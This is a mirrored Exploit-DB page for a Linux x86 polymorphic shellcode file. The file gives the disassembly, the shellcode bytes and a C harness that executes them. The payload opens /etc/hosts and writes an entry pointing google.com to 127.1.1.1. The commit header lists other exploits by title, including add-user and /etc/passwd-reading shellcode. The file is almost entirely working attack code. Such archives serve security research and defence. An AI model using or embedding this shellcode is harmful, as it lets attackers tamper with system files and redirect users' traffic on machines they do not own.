bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/45417.c
Offensive Security c1b7aa12fc DB: 2018-09-15 
10 changes to exploits/shellcodes

CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
Faleemi Plus 1.0.2 - Denial of Service (PoC)

Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)
Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)
Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection

Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)
Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
2018-09-15 05:01:52 +00:00

66 lines
No EOL
2.4 KiB
C
Raw Blame History

/*
# Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Tested on: Linux/x86
# gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
*/
/****************************************************
Disassembly of section .text:
08048060 <_start>:
8048060: 29 c9 sub ecx,ecx
8048062: 51 push ecx
08048063 <open>:
8048063: 6a 05 push 0x5
8048065: 58 pop eax
8048066: 68 6f 73 74 73 push 0x7374736f
804806b: 68 74 63 2f 68 push 0x682f6374
8048070: 68 2f 2f 2f 65 push 0x652f2f2f
8048075: 54 push esp
8048076: 5b pop ebx
8048077: 51 push ecx
8048078: 41 inc ecx
8048079: b5 04 mov ch,0x4
804807b: cd 80 int 0x80
804807d: 93 xchg ebx,eax
804807e: 6a 04 push 0x4
8048080: 58 pop eax
08048081 <write>:
8048081: 68 2e 63 6f 6d push 0x6d6f632e
8048086: 68 6f 67 6c 65 push 0x656c676f
804808b: 68 31 20 67 6f push 0x6f672031
8048090: 68 31 2e 31 2e push 0x2e312e31
8048095: 68 31 32 37 2e push 0x2e373231
804809a: 54 push esp
804809b: 59 pop ecx
804809c: 6a 14 push 0x14
804809e: 5a pop edx
804809f: cd 80 int 0x80
080480a1 <close>:
80480a1: 92 xchg edx,eax
80480a2: b0 06 mov al,0x6
80480a4: cd 80 int 0x80
080480a6 <exit>:
80480a6: 31 c0 xor eax,eax
80480a8: 40 inc eax
80480a9: cd 80 int 0x80
****************************************************/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Reference in a new issue View git blame Copy permalink